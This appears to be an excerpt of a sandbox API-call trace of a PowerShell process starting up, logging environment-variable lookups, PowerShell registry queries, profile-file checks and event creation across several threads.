	[0295.891] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.891] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0295.891] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.891] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.891] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0295.891] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.893] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdab8 | out: phkResult=0xcdab8*=0x3b0) returned 0x0
	[0295.893] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcda3c, lpData=0x0, lpcbData=0xcda38*=0x0 | out: lpType=0xcda3c*=0x1, lpData=0x0, lpcbData=0xcda38*=0x56) returned 0x0
	[0295.893] CoTaskMemAlloc (cb=0x5a) returned 0x1d7bb0
	[0295.893] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcda0c, lpData=0x1d7bb0, lpcbData=0xcda08*=0x56 | out: lpType=0xcda0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcda08*=0x56) returned 0x0
	[0295.893] CoTaskMemFree (pv=0x1d7bb0) 
	[0295.893] RegCloseKey (hKey=0x3b0) returned 0x0
	[0295.894] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.894] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.906] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.906] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.906] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.907] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.911] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.911] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.911] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.912] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.912] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.912] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.913] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.913] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.914] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.915] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.915] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0295.915] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.915] CoTaskMemFree (pv=0x1b8429c0) 
	[0295.916] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.916] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.643] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.650] CoTaskMemAlloc (cb=0x104) returned 0x1b8429c0
	[0296.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8429c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.651] CoTaskMemFree (pv=0x1b8429c0) 
	[0298.056] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b842ad0
	[0298.745] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b842be0
	[0302.660] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0302.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.660] CoTaskMemFree (pv=0x1b842cf0) 
	[0302.661] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0302.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.661] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.197] VirtualQuery (in: lpAddress=0xcbdc0, lpBuffer=0xccc80, dwLength=0x30 | out: lpBuffer=0xccc80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.201] VirtualQuery (in: lpAddress=0xcbdc0, lpBuffer=0xccc80, dwLength=0x30 | out: lpBuffer=0xccc80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.201] VirtualQuery (in: lpAddress=0xcb610, lpBuffer=0xcc4d0, dwLength=0x30 | out: lpBuffer=0xcc4d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.201] VirtualQuery (in: lpAddress=0xcb610, lpBuffer=0xcc4d0, dwLength=0x30 | out: lpBuffer=0xcc4d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdc18 | out: phkResult=0xcdc18*=0x2e4) returned 0x0
	[0303.202] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdb9c, lpData=0x0, lpcbData=0xcdb98*=0x0 | out: lpType=0xcdb9c*=0x1, lpData=0x0, lpcbData=0xcdb98*=0x56) returned 0x0
	[0303.202] CoTaskMemAlloc (cb=0x5a) returned 0x12e700
	[0303.202] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdb6c, lpData=0x12e700, lpcbData=0xcdb68*=0x56 | out: lpType=0xcdb6c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdb68*=0x56) returned 0x0
	[0303.202] CoTaskMemFree (pv=0x12e700) 
	[0303.202] RegCloseKey (hKey=0x2e4) returned 0x0
	[0303.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdc18 | out: phkResult=0xcdc18*=0x2e4) returned 0x0
	[0303.203] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdb9c, lpData=0x0, lpcbData=0xcdb98*=0x0 | out: lpType=0xcdb9c*=0x1, lpData=0x0, lpcbData=0xcdb98*=0x56) returned 0x0
	[0303.203] CoTaskMemAlloc (cb=0x5a) returned 0x12e700
	[0303.203] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcdb6c, lpData=0x12e700, lpcbData=0xcdb68*=0x56 | out: lpType=0xcdb6c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcdb68*=0x56) returned 0x0
	[0303.203] CoTaskMemFree (pv=0x12e700) 
	[0303.203] RegCloseKey (hKey=0x2e4) returned 0x0
	[0303.203] CoTaskMemAlloc (cb=0x20c) returned 0x1b839970
	[0303.203] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b839970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.203] CoTaskMemFree (pv=0x1b839970) 
	[0303.203] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.203] CoTaskMemAlloc (cb=0x20c) returned 0x1b839970
	[0303.203] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b839970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.203] CoTaskMemFree (pv=0x1b839970) 
	[0303.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0303.204] SetErrorMode (uMode=0x1) returned 0x1
	[0303.204] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdb80 | out: lpFileInformation=0xcdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.204] SetErrorMode (uMode=0x1) returned 0x1
	[0303.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0303.205] SetErrorMode (uMode=0x1) returned 0x1
	[0303.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdb80 | out: lpFileInformation=0xcdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.205] SetErrorMode (uMode=0x1) returned 0x1
	[0303.205] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0303.205] SetErrorMode (uMode=0x1) returned 0x1
	[0303.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdb80 | out: lpFileInformation=0xcdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.205] SetErrorMode (uMode=0x1) returned 0x1
	[0303.205] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0303.205] SetErrorMode (uMode=0x1) returned 0x1
	[0303.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcdb80 | out: lpFileInformation=0xcdb80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.205] SetErrorMode (uMode=0x1) returned 0x1
	[0303.206] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.207] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.207] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.207] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.208] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.208] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.209] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.209] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.210] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.210] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4
	[0303.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c
	[0303.210] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x320
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x334
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0303.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0303.212] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.212] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.214] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0303.214] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcdd60 | out: lpMode=0xcdd60) returned 1
	[0303.215] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.215] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.218] SetEvent (hEvent=0x308) returned 1
	[0303.218] SetEvent (hEvent=0x2e4) returned 1
	[0303.218] SetEvent (hEvent=0x39c) returned 1
	[0303.218] SetEvent (hEvent=0x304) returned 1
	[0303.218] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0303.220] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0303.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.220] CoTaskMemFree (pv=0x1b842cf0) 
	[0303.220] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdab8 | out: phkResult=0xcdab8*=0x3a4) returned 0x0
	[0303.220] RegQueryValueExW (in: hKey=0x3a4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcda3c, lpData=0x0, lpcbData=0xcda38*=0x0 | out: lpType=0xcda3c*=0x0, lpData=0x0, lpcbData=0xcda38*=0x0) returned 0x2

Thread:
	id = 39
	os_tid = 0x58c


Thread:
	id = 44
	os_tid = 0x7f4


Thread:
	id = 52
	os_tid = 0x760


Thread:
	id = 59
	os_tid = 0x9c8


Thread:
	id = 65
	os_tid = 0x8f0

	[0241.171] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0273.784] RegCloseKey (hKey=0x1cc) returned 0x0
	[0273.784] LocalFree (hMem=0x1372c0) returned 0x0
	[0273.784] CloseHandle (hObject=0x320) returned 1
	[0273.784] CloseHandle (hObject=0x13) returned 1
	[0273.785] CloseHandle (hObject=0xf) returned 1
	[0273.785] RegCloseKey (hKey=0x30c) returned 0x0
	[0273.786] RegCloseKey (hKey=0x308) returned 0x0
	[0273.786] RegCloseKey (hKey=0x304) returned 0x0
	[0273.786] LocalFree (hMem=0x137290) returned 0x0
	[0283.113] RegCloseKey (hKey=0x304) returned 0x0
	[0292.638] RegCloseKey (hKey=0x390) returned 0x0
	[0292.638] RegCloseKey (hKey=0x38c) returned 0x0
	[0292.638] RegCloseKey (hKey=0x388) returned 0x0
	[0292.638] RegCloseKey (hKey=0x384) returned 0x0
	[0292.639] RegCloseKey (hKey=0x380) returned 0x0
	[0292.639] RegCloseKey (hKey=0x37c) returned 0x0
	[0292.639] RegCloseKey (hKey=0x378) returned 0x0
	[0292.639] RegCloseKey (hKey=0x350) returned 0x0
	[0292.640] RegCloseKey (hKey=0x3ac) returned 0x0
	[0292.640] RegCloseKey (hKey=0x3a8) returned 0x0
	[0292.640] RegCloseKey (hKey=0x370) returned 0x0
	[0292.640] RegCloseKey (hKey=0x36c) returned 0x0
	[0292.641] RegCloseKey (hKey=0x368) returned 0x0
	[0292.641] RegCloseKey (hKey=0x364) returned 0x0
	[0292.641] RegCloseKey (hKey=0x360) returned 0x0
	[0292.641] RegCloseKey (hKey=0x35c) returned 0x0
	[0292.642] RegCloseKey (hKey=0x358) returned 0x0
	[0292.642] RegCloseKey (hKey=0x354) returned 0x0
	[0292.642] RegCloseKey (hKey=0x3a4) returned 0x0
	[0292.642] RegCloseKey (hKey=0x344) returned 0x0
	[0292.643] RegCloseKey (hKey=0x340) returned 0x0
	[0292.643] RegCloseKey (hKey=0x33c) returned 0x0
	[0292.643] RegCloseKey (hKey=0x338) returned 0x0
	[0292.643] RegCloseKey (hKey=0x334) returned 0x0
	[0292.644] RegCloseKey (hKey=0x330) returned 0x0
	[0292.644] RegCloseKey (hKey=0x1cc) returned 0x0
	[0292.644] RegCloseKey (hKey=0x320) returned 0x0
	[0292.644] RegCloseKey (hKey=0x3a0) returned 0x0
	[0292.644] RegCloseKey (hKey=0x308) returned 0x0
	[0292.645] RegCloseKey (hKey=0x304) returned 0x0
	[0292.645] RegCloseKey (hKey=0x39c) returned 0x0
	[0292.645] RegCloseKey (hKey=0x398) returned 0x0
	[0292.645] RegCloseKey (hKey=0x374) returned 0x0
	[0292.645] RegCloseKey (hKey=0x3b0) returned 0x0
	[0641.530] RegCloseKey (hKey=0x3a4) returned 0x0

Thread:
	id = 157
	os_tid = 0x8d4


Thread:
	id = 238
	os_tid = 0xcec

	[0305.406] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0305.409] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0305.413] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.413] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.414] VirtualQuery (in: lpAddress=0x1c87db40, lpBuffer=0x1c87ea00, dwLength=0x30 | out: lpBuffer=0x1c87ea00*(BaseAddress=0x1c87d000, AllocationBase=0x1bef0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0305.417] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.417] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.419] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.419] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.422] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.422] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.437] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.437] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.439] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.439] CoTaskMemFree (pv=0x1b842cf0) 
	[0305.440] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0305.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.440] CoTaskMemFree (pv=0x1b842cf0) 
